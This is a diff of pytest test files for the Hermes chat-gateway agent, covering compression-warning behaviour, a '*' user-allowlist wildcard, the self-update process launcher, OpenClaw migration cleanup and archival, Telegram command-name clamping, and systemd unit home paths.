return runner
|
||||
|
||||
def test_first_warn_is_sent(self):
|
||||
runner = self._make_runner()
|
||||
now = 1_000_000.0
|
||||
last = runner._compression_warn_sent.get("chat:1", 0)
|
||||
assert now - last >= runner._compression_warn_cooldown
|
||||
|
||||
def test_second_warn_suppressed_within_cooldown(self):
|
||||
runner = self._make_runner()
|
||||
now = 1_000_000.0
|
||||
runner._compression_warn_sent["chat:1"] = now - 60 # 1 minute ago
|
||||
last = runner._compression_warn_sent.get("chat:1", 0)
|
||||
assert now - last < runner._compression_warn_cooldown
|
||||
|
||||
def test_warn_allowed_after_cooldown(self):
|
||||
runner = self._make_runner()
|
||||
now = 1_000_000.0
|
||||
runner._compression_warn_sent["chat:1"] = now - 3601 # just past cooldown
|
||||
last = runner._compression_warn_sent.get("chat:1", 0)
|
||||
assert now - last >= runner._compression_warn_cooldown
|
||||
|
||||
def test_rate_limit_is_per_chat(self):
|
||||
"""Rate-limiting one chat must not suppress warnings for another."""
|
||||
runner = self._make_runner()
|
||||
now = 1_000_000.0
|
||||
runner._compression_warn_sent["chat:1"] = now - 60 # suppressed
|
||||
last_other = runner._compression_warn_sent.get("chat:2", 0)
|
||||
assert now - last_other >= runner._compression_warn_cooldown
|
||||
|
||||
|
||||
class TestEstimatedTokenThreshold:
|
||||
|
|
@ -421,10 +381,6 @@ async def test_session_hygiene_messages_stay_in_originating_topic(monkeypatch, t
|
|||
result = await runner._handle_message(event)
|
||||
|
||||
assert result == "ok"
|
||||
assert len(adapter.sent) == 2
|
||||
assert adapter.sent[0]["chat_id"] == "-1001"
|
||||
assert "Session is large" in adapter.sent[0]["content"]
|
||||
assert adapter.sent[0]["metadata"] == {"thread_id": "17585"}
|
||||
assert adapter.sent[1]["chat_id"] == "-1001"
|
||||
assert "Compressed:" in adapter.sent[1]["content"]
|
||||
assert adapter.sent[1]["metadata"] == {"thread_id": "17585"}
|
||||
# Compression warnings are no longer sent to users — compression
|
||||
# happens silently with server-side logging only.
|
||||
assert len(adapter.sent) == 0
|
||||
|
|
|
|||
|
|
@ -90,6 +90,46 @@ def test_whatsapp_lid_user_matches_phone_allowlist_via_session_mapping(monkeypat
|
|||
assert runner._is_user_authorized(source) is True
|
||||
|
||||
|
||||
def test_star_wildcard_in_allowlist_authorizes_any_user(monkeypatch):
|
||||
"""WHATSAPP_ALLOWED_USERS=* should act as allow-all wildcard."""
|
||||
_clear_auth_env(monkeypatch)
|
||||
monkeypatch.setenv("WHATSAPP_ALLOWED_USERS", "*")
|
||||
|
||||
runner, _adapter = _make_runner(
|
||||
Platform.WHATSAPP,
|
||||
GatewayConfig(platforms={Platform.WHATSAPP: PlatformConfig(enabled=True)}),
|
||||
)
|
||||
|
||||
source = SessionSource(
|
||||
platform=Platform.WHATSAPP,
|
||||
user_id="99998887776@s.whatsapp.net",
|
||||
chat_id="99998887776@s.whatsapp.net",
|
||||
user_name="stranger",
|
||||
chat_type="dm",
|
||||
)
|
||||
assert runner._is_user_authorized(source) is True
|
||||
|
||||
|
||||
def test_star_wildcard_works_for_any_platform(monkeypatch):
|
||||
"""The * wildcard should work generically, not just for WhatsApp."""
|
||||
_clear_auth_env(monkeypatch)
|
||||
monkeypatch.setenv("TELEGRAM_ALLOWED_USERS", "*")
|
||||
|
||||
runner, _adapter = _make_runner(
|
||||
Platform.TELEGRAM,
|
||||
GatewayConfig(platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="t")}),
|
||||
)
|
||||
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
user_id="123456789",
|
||||
chat_id="123456789",
|
||||
user_name="stranger",
|
||||
chat_type="dm",
|
||||
)
|
||||
assert runner._is_user_authorized(source) is True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_dm_pairs_by_default(monkeypatch):
|
||||
_clear_auth_env(monkeypatch)
|
||||
|
|
|
|||
|
|
@ -45,6 +45,17 @@ def _make_runner():
|
|||
class TestHandleUpdateCommand:
|
||||
"""Tests for GatewayRunner._handle_update_command."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_managed_install_returns_package_manager_guidance(self, monkeypatch):
|
||||
runner = _make_runner()
|
||||
event = _make_event()
|
||||
monkeypatch.setenv("HERMES_MANAGED", "homebrew")
|
||||
|
||||
result = await runner._handle_update_command(event)
|
||||
|
||||
assert "managed by Homebrew" in result
|
||||
assert "brew upgrade hermes-agent" in result
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_no_git_directory(self, tmp_path):
|
||||
"""Returns an error when .git does not exist."""
|
||||
|
|
@ -191,7 +202,7 @@ class TestHandleUpdateCommand:
|
|||
|
||||
with patch("gateway.run._hermes_home", hermes_home), \
|
||||
patch("gateway.run.__file__", fake_file), \
|
||||
patch("shutil.which", side_effect=lambda x: "/usr/bin/hermes" if x == "hermes" else "/usr/bin/systemd-run"), \
|
||||
patch("shutil.which", side_effect=lambda x: "/usr/bin/hermes" if x == "hermes" else "/usr/bin/setsid"), \
|
||||
patch("subprocess.Popen"):
|
||||
result = await runner._handle_update_command(event)
|
||||
|
||||
|
|
@ -204,8 +215,8 @@ class TestHandleUpdateCommand:
|
|||
assert not (hermes_home / ".update_exit_code").exists()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_spawns_systemd_run(self, tmp_path):
|
||||
"""Uses systemd-run when available."""
|
||||
async def test_spawns_setsid(self, tmp_path):
|
||||
"""Uses setsid when available."""
|
||||
runner = _make_runner()
|
||||
event = _make_event()
|
||||
|
||||
|
|
@ -225,16 +236,16 @@ class TestHandleUpdateCommand:
|
|||
patch("subprocess.Popen", mock_popen):
|
||||
result = await runner._handle_update_command(event)
|
||||
|
||||
# Verify systemd-run was used
|
||||
# Verify setsid was used
|
||||
call_args = mock_popen.call_args[0][0]
|
||||
assert call_args[0] == "/usr/bin/systemd-run"
|
||||
assert "--scope" in call_args
|
||||
assert call_args[0] == "/usr/bin/setsid"
|
||||
assert call_args[1] == "bash"
|
||||
assert ".update_exit_code" in call_args[-1]
|
||||
assert "Starting Hermes update" in result
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_fallback_nohup_when_no_systemd_run(self, tmp_path):
|
||||
"""Falls back to nohup when systemd-run is not available."""
|
||||
async def test_fallback_when_no_setsid(self, tmp_path):
|
||||
"""Falls back to start_new_session=True when setsid is not available."""
|
||||
runner = _make_runner()
|
||||
event = _make_event()
|
||||
|
||||
|
|
@ -249,24 +260,27 @@ class TestHandleUpdateCommand:
|
|||
|
||||
mock_popen = MagicMock()
|
||||
|
||||
def which_no_systemd(x):
|
||||
def which_no_setsid(x):
|
||||
if x == "hermes":
|
||||
return "/usr/bin/hermes"
|
||||
if x == "systemd-run":
|
||||
if x == "setsid":
|
||||
return None
|
||||
return None
|
||||
|
||||
with patch("gateway.run._hermes_home", hermes_home), \
|
||||
patch("gateway.run.__file__", fake_file), \
|
||||
patch("shutil.which", side_effect=which_no_systemd), \
|
||||
patch("shutil.which", side_effect=which_no_setsid), \
|
||||
patch("subprocess.Popen", mock_popen):
|
||||
result = await runner._handle_update_command(event)
|
||||
|
||||
# Verify bash -c nohup fallback was used
|
||||
# Verify plain bash -c fallback (no nohup, no setsid)
|
||||
call_args = mock_popen.call_args[0][0]
|
||||
assert call_args[0] == "bash"
|
||||
assert "nohup" in call_args[2]
|
||||
assert "nohup" not in call_args[2]
|
||||
assert ".update_exit_code" in call_args[2]
|
||||
# start_new_session=True should be in kwargs
|
||||
call_kwargs = mock_popen.call_args[1]
|
||||
assert call_kwargs.get("start_new_session") is True
|
||||
assert "Starting Hermes update" in result
|
||||
|
||||
@pytest.mark.asyncio
|
||||
|
|
|
|||
|
|
@ -40,6 +40,119 @@ class TestFindMigrationScript:
|
|||
assert claw_mod._find_migration_script() is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _find_openclaw_dirs
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestFindOpenclawDirs:
|
||||
"""Test discovery of OpenClaw directories."""
|
||||
|
||||
def test_finds_openclaw_dir(self, tmp_path):
|
||||
openclaw = tmp_path / ".openclaw"
|
||||
openclaw.mkdir()
|
||||
with patch("pathlib.Path.home", return_value=tmp_path):
|
||||
found = claw_mod._find_openclaw_dirs()
|
||||
assert openclaw in found
|
||||
|
||||
def test_finds_legacy_dirs(self, tmp_path):
|
||||
clawdbot = tmp_path / ".clawdbot"
|
||||
clawdbot.mkdir()
|
||||
moldbot = tmp_path / ".moldbot"
|
||||
moldbot.mkdir()
|
||||
with patch("pathlib.Path.home", return_value=tmp_path):
|
||||
found = claw_mod._find_openclaw_dirs()
|
||||
assert len(found) == 2
|
||||
assert clawdbot in found
|
||||
assert moldbot in found
|
||||
|
||||
def test_returns_empty_when_none_exist(self, tmp_path):
|
||||
with patch("pathlib.Path.home", return_value=tmp_path):
|
||||
found = claw_mod._find_openclaw_dirs()
|
||||
assert found == []
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _scan_workspace_state
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestScanWorkspaceState:
|
||||
"""Test scanning for workspace state files."""
|
||||
|
||||
def test_finds_root_state_files(self, tmp_path):
|
||||
(tmp_path / "todo.json").write_text("{}")
|
||||
(tmp_path / "sessions").mkdir()
|
||||
findings = claw_mod._scan_workspace_state(tmp_path)
|
||||
descs = [desc for _, desc in findings]
|
||||
assert any("todo.json" in d for d in descs)
|
||||
assert any("sessions" in d for d in descs)
|
||||
|
||||
def test_finds_workspace_state_files(self, tmp_path):
|
||||
ws = tmp_path / "workspace"
|
||||
ws.mkdir()
|
||||
(ws / "todo.json").write_text("{}")
|
||||
(ws / "sessions").mkdir()
|
||||
findings = claw_mod._scan_workspace_state(tmp_path)
|
||||
descs = [desc for _, desc in findings]
|
||||
assert any("workspace/todo.json" in d for d in descs)
|
||||
assert any("workspace/sessions" in d for d in descs)
|
||||
|
||||
def test_ignores_hidden_dirs(self, tmp_path):
|
||||
scan_dir = tmp_path / "scan_target"
|
||||
scan_dir.mkdir()
|
||||
hidden = scan_dir / ".git"
|
||||
hidden.mkdir()
|
||||
(hidden / "todo.json").write_text("{}")
|
||||
findings = claw_mod._scan_workspace_state(scan_dir)
|
||||
assert len(findings) == 0
|
||||
|
||||
def test_empty_dir_returns_empty(self, tmp_path):
|
||||
scan_dir = tmp_path / "scan_target"
|
||||
scan_dir.mkdir()
|
||||
findings = claw_mod._scan_workspace_state(scan_dir)
|
||||
assert findings == []
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _archive_directory
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestArchiveDirectory:
|
||||
"""Test directory archival (rename)."""
|
||||
|
||||
def test_renames_to_pre_migration(self, tmp_path):
|
||||
source = tmp_path / ".openclaw"
|
||||
source.mkdir()
|
||||
(source / "test.txt").write_text("data")
|
||||
|
||||
archive_path = claw_mod._archive_directory(source)
|
||||
assert archive_path == tmp_path / ".openclaw.pre-migration"
|
||||
assert archive_path.is_dir()
|
||||
assert not source.exists()
|
||||
assert (archive_path / "test.txt").read_text() == "data"
|
||||
|
||||
def test_adds_timestamp_when_archive_exists(self, tmp_path):
|
||||
source = tmp_path / ".openclaw"
|
||||
source.mkdir()
|
||||
# Pre-existing archive
|
||||
(tmp_path / ".openclaw.pre-migration").mkdir()
|
||||
|
||||
archive_path = claw_mod._archive_directory(source)
|
||||
assert ".pre-migration-" in archive_path.name
|
||||
assert archive_path.is_dir()
|
||||
assert not source.exists()
|
||||
|
||||
def test_dry_run_does_not_rename(self, tmp_path):
|
||||
source = tmp_path / ".openclaw"
|
||||
source.mkdir()
|
||||
|
||||
archive_path = claw_mod._archive_directory(source, dry_run=True)
|
||||
assert archive_path == tmp_path / ".openclaw.pre-migration"
|
||||
assert source.is_dir() # Still exists
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# claw_command routing
|
||||
# ---------------------------------------------------------------------------
|
||||
|
|
@ -56,11 +169,24 @@ class TestClawCommand:
|
|||
claw_mod.claw_command(args)
|
||||
mock.assert_called_once_with(args)
|
||||
|
||||
def test_routes_to_cleanup(self):
|
||||
args = Namespace(claw_action="cleanup", source=None, dry_run=False, yes=False)
|
||||
with patch.object(claw_mod, "_cmd_cleanup") as mock:
|
||||
claw_mod.claw_command(args)
|
||||
mock.assert_called_once_with(args)
|
||||
|
||||
def test_routes_clean_alias(self):
|
||||
args = Namespace(claw_action="clean", source=None, dry_run=False, yes=False)
|
||||
with patch.object(claw_mod, "_cmd_cleanup") as mock:
|
||||
claw_mod.claw_command(args)
|
||||
mock.assert_called_once_with(args)
|
||||
|
||||
def test_shows_help_for_no_action(self, capsys):
|
||||
args = Namespace(claw_action=None)
|
||||
claw_mod.claw_command(args)
|
||||
captured = capsys.readouterr()
|
||||
assert "migrate" in captured.out
|
||||
assert "cleanup" in captured.out
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
|
@ -168,6 +294,7 @@ class TestCmdMigrate:
|
|||
patch.object(claw_mod, "_load_migration_module", return_value=fake_mod),
|
||||
patch.object(claw_mod, "get_config_path", return_value=config_path),
|
||||
patch.object(claw_mod, "prompt_yes_no", return_value=True),
|
||||
patch.object(claw_mod, "_offer_source_archival"),
|
||||
):
|
||||
claw_mod._cmd_migrate(args)
|
||||
|
||||
|
|
@ -175,6 +302,75 @@ class TestCmdMigrate:
|
|||
assert "Migration Results" in captured.out
|
||||
assert "Migration complete!" in captured.out
|
||||
|
||||
def test_execute_offers_archival_on_success(self, tmp_path, capsys):
|
||||
"""After successful migration, _offer_source_archival should be called."""
|
||||
openclaw_dir = tmp_path / ".openclaw"
|
||||
openclaw_dir.mkdir()
|
||||
|
||||
fake_mod = ModuleType("openclaw_to_hermes")
|
||||
fake_mod.resolve_selected_options = MagicMock(return_value={"soul"})
|
||||
fake_migrator = MagicMock()
|
||||
fake_migrator.migrate.return_value = {
|
||||
"summary": {"migrated": 3, "skipped": 0, "conflict": 0, "error": 0},
|
||||
"items": [
|
||||
{"kind": "soul", "status": "migrated", "destination": str(tmp_path / "SOUL.md")},
|
||||
],
|
||||
}
|
||||
fake_mod.Migrator = MagicMock(return_value=fake_migrator)
|
||||
|
||||
args = Namespace(
|
||||
source=str(openclaw_dir),
|
||||
dry_run=False, preset="full", overwrite=False,
|
||||
migrate_secrets=False, workspace_target=None,
|
||||
skill_conflict="skip", yes=True,
|
||||
)
|
||||
|
||||
with (
|
||||
patch.object(claw_mod, "_find_migration_script", return_value=tmp_path / "s.py"),
|
||||
patch.object(claw_mod, "_load_migration_module", return_value=fake_mod),
|
||||
patch.object(claw_mod, "get_config_path", return_value=tmp_path / "config.yaml"),
|
||||
patch.object(claw_mod, "save_config"),
|
||||
patch.object(claw_mod, "load_config", return_value={}),
|
||||
patch.object(claw_mod, "_offer_source_archival") as mock_archival,
|
||||
):
|
||||
claw_mod._cmd_migrate(args)
|
||||
|
||||
mock_archival.assert_called_once_with(openclaw_dir, True)
|
||||
|
||||
def test_dry_run_skips_archival(self, tmp_path, capsys):
|
||||
"""Dry run should not offer archival."""
|
||||
openclaw_dir = tmp_path / ".openclaw"
|
||||
openclaw_dir.mkdir()
|
||||
|
||||
fake_mod = ModuleType("openclaw_to_hermes")
|
||||
fake_mod.resolve_selected_options = MagicMock(return_value=set())
|
||||
fake_migrator = MagicMock()
|
||||
fake_migrator.migrate.return_value = {
|
||||
"summary": {"migrated": 2, "skipped": 0, "conflict": 0, "error": 0},
|
||||
"items": [],
|
||||
"preset": "full",
|
||||
}
|
||||
fake_mod.Migrator = MagicMock(return_value=fake_migrator)
|
||||
|
||||
args = Namespace(
|
||||
source=str(openclaw_dir),
|
||||
dry_run=True, preset="full", overwrite=False,
|
||||
migrate_secrets=False, workspace_target=None,
|
||||
skill_conflict="skip", yes=False,
|
||||
)
|
||||
|
||||
with (
|
||||
patch.object(claw_mod, "_find_migration_script", return_value=tmp_path / "s.py"),
|
||||
patch.object(claw_mod, "_load_migration_module", return_value=fake_mod),
|
||||
patch.object(claw_mod, "get_config_path", return_value=tmp_path / "config.yaml"),
|
||||
patch.object(claw_mod, "save_config"),
|
||||
patch.object(claw_mod, "load_config", return_value={}),
|
||||
patch.object(claw_mod, "_offer_source_archival") as mock_archival,
|
||||
):
|
||||
claw_mod._cmd_migrate(args)
|
||||
|
||||
mock_archival.assert_not_called()
|
||||
|
||||
def test_execute_cancelled_by_user(self, tmp_path, capsys):
|
||||
openclaw_dir = tmp_path / ".openclaw"
|
||||
openclaw_dir.mkdir()
|
||||
|
|
@ -290,6 +486,172 @@ class TestCmdMigrate:
|
|||
assert call_kwargs["migrate_secrets"] is True
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _offer_source_archival
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestOfferSourceArchival:
|
||||
"""Test the post-migration archival offer."""
|
||||
|
||||
def test_archives_with_auto_yes(self, tmp_path, capsys):
|
||||
source = tmp_path / ".openclaw"
|
||||
source.mkdir()
|
||||
(source / "workspace").mkdir()
|
||||
(source / "workspace" / "todo.json").write_text("{}")
|
||||
|
||||
claw_mod._offer_source_archival(source, auto_yes=True)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Archived" in captured.out
|
||||
assert not source.exists()
|
||||
assert (tmp_path / ".openclaw.pre-migration").is_dir()
|
||||
|
||||
def test_skips_when_user_declines(self, tmp_path, capsys):
|
||||
source = tmp_path / ".openclaw"
|
||||
source.mkdir()
|
||||
|
||||
with patch.object(claw_mod, "prompt_yes_no", return_value=False):
|
||||
claw_mod._offer_source_archival(source, auto_yes=False)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Skipped" in captured.out
|
||||
assert source.is_dir() # Still exists
|
||||
|
||||
def test_noop_when_source_missing(self, tmp_path, capsys):
|
||||
claw_mod._offer_source_archival(tmp_path / "nonexistent", auto_yes=True)
|
||||
captured = capsys.readouterr()
|
||||
assert captured.out == "" # No output
|
||||
|
||||
def test_shows_state_files(self, tmp_path, capsys):
|
||||
source = tmp_path / ".openclaw"
|
||||
source.mkdir()
|
||||
ws = source / "workspace"
|
||||
ws.mkdir()
|
||||
(ws / "todo.json").write_text("{}")
|
||||
|
||||
with patch.object(claw_mod, "prompt_yes_no", return_value=False):
|
||||
claw_mod._offer_source_archival(source, auto_yes=False)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "todo.json" in captured.out
|
||||
|
||||
def test_handles_archive_error(self, tmp_path, capsys):
|
||||
source = tmp_path / ".openclaw"
|
||||
source.mkdir()
|
||||
|
||||
with patch.object(claw_mod, "_archive_directory", side_effect=OSError("permission denied")):
|
||||
claw_mod._offer_source_archival(source, auto_yes=True)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Could not archive" in captured.out
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _cmd_cleanup
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestCmdCleanup:
|
||||
"""Test the cleanup command handler."""
|
||||
|
||||
def test_no_dirs_found(self, tmp_path, capsys):
|
||||
args = Namespace(source=None, dry_run=False, yes=False)
|
||||
with patch.object(claw_mod, "_find_openclaw_dirs", return_value=[]):
|
||||
claw_mod._cmd_cleanup(args)
|
||||
captured = capsys.readouterr()
|
||||
assert "No OpenClaw directories found" in captured.out
|
||||
|
||||
def test_dry_run_lists_dirs(self, tmp_path, capsys):
|
||||
openclaw = tmp_path / ".openclaw"
|
||||
openclaw.mkdir()
|
||||
ws = openclaw / "workspace"
|
||||
ws.mkdir()
|
||||
(ws / "todo.json").write_text("{}")
|
||||
|
||||
args = Namespace(source=None, dry_run=True, yes=False)
|
||||
with patch.object(claw_mod, "_find_openclaw_dirs", return_value=[openclaw]):
|
||||
claw_mod._cmd_cleanup(args)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Would archive" in captured.out
|
||||
assert openclaw.is_dir() # Not actually archived
|
||||
|
||||
def test_archives_with_yes(self, tmp_path, capsys):
|
||||
openclaw = tmp_path / ".openclaw"
|
||||
openclaw.mkdir()
|
||||
(openclaw / "workspace").mkdir()
|
||||
(openclaw / "workspace" / "todo.json").write_text("{}")
|
||||
|
||||
args = Namespace(source=None, dry_run=False, yes=True)
|
||||
with patch.object(claw_mod, "_find_openclaw_dirs", return_value=[openclaw]):
|
||||
claw_mod._cmd_cleanup(args)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Archived" in captured.out
|
||||
assert "Cleaned up 1" in captured.out
|
||||
assert not openclaw.exists()
|
||||
assert (tmp_path / ".openclaw.pre-migration").is_dir()
|
||||
|
||||
def test_skips_when_user_declines(self, tmp_path, capsys):
|
||||
openclaw = tmp_path / ".openclaw"
|
||||
openclaw.mkdir()
|
||||
|
||||
args = Namespace(source=None, dry_run=False, yes=False)
|
||||
with (
|
||||
patch.object(claw_mod, "_find_openclaw_dirs", return_value=[openclaw]),
|
||||
patch.object(claw_mod, "prompt_yes_no", return_value=False),
|
||||
):
|
||||
claw_mod._cmd_cleanup(args)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Skipped" in captured.out
|
||||
assert openclaw.is_dir()
|
||||
|
||||
def test_explicit_source(self, tmp_path, capsys):
|
||||
custom_dir = tmp_path / "my-openclaw"
|
||||
custom_dir.mkdir()
|
||||
(custom_dir / "todo.json").write_text("{}")
|
||||
|
||||
args = Namespace(source=str(custom_dir), dry_run=False, yes=True)
|
||||
claw_mod._cmd_cleanup(args)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Archived" in captured.out
|
||||
assert not custom_dir.exists()
|
||||
|
||||
def test_shows_workspace_details(self, tmp_path, capsys):
|
||||
openclaw = tmp_path / ".openclaw"
|
||||
openclaw.mkdir()
|
||||
ws = openclaw / "workspace"
|
||||
ws.mkdir()
|
||||
(ws / "todo.json").write_text("{}")
|
||||
(ws / "SOUL.md").write_text("# Soul")
|
||||
|
||||
args = Namespace(source=None, dry_run=True, yes=False)
|
||||
with patch.object(claw_mod, "_find_openclaw_dirs", return_value=[openclaw]):
|
||||
claw_mod._cmd_cleanup(args)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "workspace/" in captured.out
|
||||
assert "todo.json" in captured.out
|
||||
|
||||
def test_handles_multiple_dirs(self, tmp_path, capsys):
|
||||
openclaw = tmp_path / ".openclaw"
|
||||
openclaw.mkdir()
|
||||
clawdbot = tmp_path / ".clawdbot"
|
||||
clawdbot.mkdir()
|
||||
|
||||
args = Namespace(source=None, dry_run=False, yes=True)
|
||||
with patch.object(claw_mod, "_find_openclaw_dirs", return_value=[openclaw, clawdbot]):
|
||||
claw_mod._cmd_cleanup(args)
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "Cleaned up 2" in captured.out
|
||||
assert not openclaw.exists()
|
||||
assert not clawdbot.exists()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _print_migration_report
|
||||
# ---------------------------------------------------------------------------
|
||||
|
|
|
|||
|
|
@ -12,10 +12,13 @@ from hermes_cli.commands import (
|
|||
SUBCOMMANDS,
|
||||
SlashCommandAutoSuggest,
|
||||
SlashCommandCompleter,
|
||||
_TG_NAME_LIMIT,
|
||||
_clamp_telegram_names,
|
||||
gateway_help_lines,
|
||||
resolve_command,
|
||||
slack_subcommand_map,
|
||||
telegram_bot_commands,
|
||||
telegram_menu_commands,
|
||||
)
|
||||
|
||||
|
||||
|
|
@ -504,3 +507,83 @@ class TestGhostText:
|
|||
|
||||
def test_no_suggestion_for_non_slash(self):
|
||||
assert _suggestion("hello") is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Telegram command name clamping (32-char limit)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestClampTelegramNames:
|
||||
"""Tests for _clamp_telegram_names() — 32-char enforcement + collision."""
|
||||
|
||||
def test_short_names_unchanged(self):
|
||||
entries = [("help", "Show help"), ("status", "Show status")]
|
||||
result = _clamp_telegram_names(entries, set())
|
||||
assert result == entries
|
||||
|
||||
def test_long_name_truncated(self):
|
||||
long = "a" * 40
|
||||
result = _clamp_telegram_names([(long, "desc")], set())
|
||||
assert len(result) == 1
|
||||
assert result[0][0] == "a" * _TG_NAME_LIMIT
|
||||
assert result[0][1] == "desc"
|
||||
|
||||
def test_collision_with_reserved_gets_digit_suffix(self):
|
||||
# The truncated form collides with a reserved name
|
||||
prefix = "x" * _TG_NAME_LIMIT
|
||||
long_name = "x" * 40
|
||||
result = _clamp_telegram_names([(long_name, "d")], reserved={prefix})
|
||||
assert len(result) == 1
|
||||
name = result[0][0]
|
||||
assert len(name) == _TG_NAME_LIMIT
|
||||
assert name == "x" * (_TG_NAME_LIMIT - 1) + "0"
|
||||
|
||||
def test_collision_between_entries_gets_incrementing_digits(self):
|
||||
# Two long names that truncate to the same 32-char prefix
|
||||
base = "y" * 40
|
||||
entries = [(base + "_alpha", "d1"), (base + "_beta", "d2")]
|
||||
result = _clamp_telegram_names(entries, set())
|
||||
assert len(result) == 2
|
||||
assert result[0][0] == "y" * _TG_NAME_LIMIT
|
||||
assert result[1][0] == "y" * (_TG_NAME_LIMIT - 1) + "0"
|
||||
|
||||
def test_collision_with_reserved_and_entries_skips_taken_digits(self):
|
||||
prefix = "z" * _TG_NAME_LIMIT
|
||||
digit0 = "z" * (_TG_NAME_LIMIT - 1) + "0"
|
||||
# Reserve both the plain truncation and digit-0
|
||||
reserved = {prefix, digit0}
|
||||
long_name = "z" * 50
|
||||
result = _clamp_telegram_names([(long_name, "d")], reserved)
|
||||
assert len(result) == 1
|
||||
assert result[0][0] == "z" * (_TG_NAME_LIMIT - 1) + "1"
|
||||
|
||||
def test_all_digits_exhausted_drops_entry(self):
|
||||
prefix = "w" * _TG_NAME_LIMIT
|
||||
# Reserve the plain truncation + all 10 digit slots
|
||||
reserved = {prefix} | {"w" * (_TG_NAME_LIMIT - 1) + str(d) for d in range(10)}
|
||||
long_name = "w" * 50
|
||||
result = _clamp_telegram_names([(long_name, "d")], reserved)
|
||||
assert result == []
|
||||
|
||||
def test_exact_32_chars_not_truncated(self):
|
||||
name = "a" * _TG_NAME_LIMIT
|
||||
result = _clamp_telegram_names([(name, "desc")], set())
|
||||
assert result[0][0] == name
|
||||
|
||||
def test_duplicate_short_name_deduplicated(self):
|
||||
entries = [("foo", "d1"), ("foo", "d2")]
|
||||
result = _clamp_telegram_names(entries, set())
|
||||
assert len(result) == 1
|
||||
assert result[0] == ("foo", "d1")
|
||||
|
||||
|
||||
class TestTelegramMenuCommands:
|
||||
"""Integration: telegram_menu_commands enforces the 32-char limit."""
|
||||
|
||||
def test_all_names_within_limit(self):
|
||||
menu, _ = telegram_menu_commands(max_commands=100)
|
||||
for name, _desc in menu:
|
||||
assert 1 <= len(name) <= _TG_NAME_LIMIT, (
|
||||
f"Command '{name}' is {len(name)} chars (limit {_TG_NAME_LIMIT})"
|
||||
)
|
||||
|
|
|
|||
|
|
@ -271,7 +271,7 @@ class TestGatewaySystemServiceRouting:
|
|||
)
|
||||
|
||||
run_calls = []
|
||||
monkeypatch.setattr(gateway_cli, "run_gateway", lambda verbose=False, replace=False: run_calls.append((verbose, replace)))
|
||||
monkeypatch.setattr(gateway_cli, "run_gateway", lambda verbose=0, quiet=False, replace=False: run_calls.append((verbose, quiet, replace)))
|
||||
monkeypatch.setattr(gateway_cli, "kill_gateway_processes", lambda force=False: 0)
|
||||
|
||||
try:
|
||||
|
|
@ -339,6 +339,102 @@ class TestDetectVenvDir:
|
|||
assert result is None
|
||||
|
||||
|
||||
class TestSystemUnitHermesHome:
|
||||
"""HERMES_HOME in system units must reference the target user, not root."""
|
||||
|
||||
def test_system_unit_uses_target_user_home_not_calling_user(self, monkeypatch):
|
||||
# Simulate sudo: Path.home() returns /root, target user is alice
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_system_service_identity",
|
||||
lambda run_as_user=None: ("alice", "alice", "/home/alice"),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_build_user_local_paths",
|
||||
lambda home, existing: [],
|
||||
)
|
||||
|
||||
unit = gateway_cli.generate_systemd_unit(system=True, run_as_user="alice")
|
||||
|
||||
assert 'HERMES_HOME=/home/alice/.hermes' in unit
|
||||
assert '/root/.hermes' not in unit
|
||||
|
||||
def test_system_unit_remaps_profile_to_target_user(self, monkeypatch):
|
||||
# Simulate sudo with a profile: HERMES_HOME was resolved under root
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/root/.hermes/profiles/coder")
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_system_service_identity",
|
||||
lambda run_as_user=None: ("alice", "alice", "/home/alice"),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_build_user_local_paths",
|
||||
lambda home, existing: [],
|
||||
)
|
||||
|
||||
unit = gateway_cli.generate_systemd_unit(system=True, run_as_user="alice")
|
||||
|
||||
assert 'HERMES_HOME=/home/alice/.hermes/profiles/coder' in unit
|
||||
assert '/root/' not in unit
|
||||
|
||||
def test_system_unit_preserves_custom_hermes_home(self, monkeypatch):
|
||||
# Custom HERMES_HOME not under any user's home — keep as-is
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/opt/hermes-shared")
|
||||
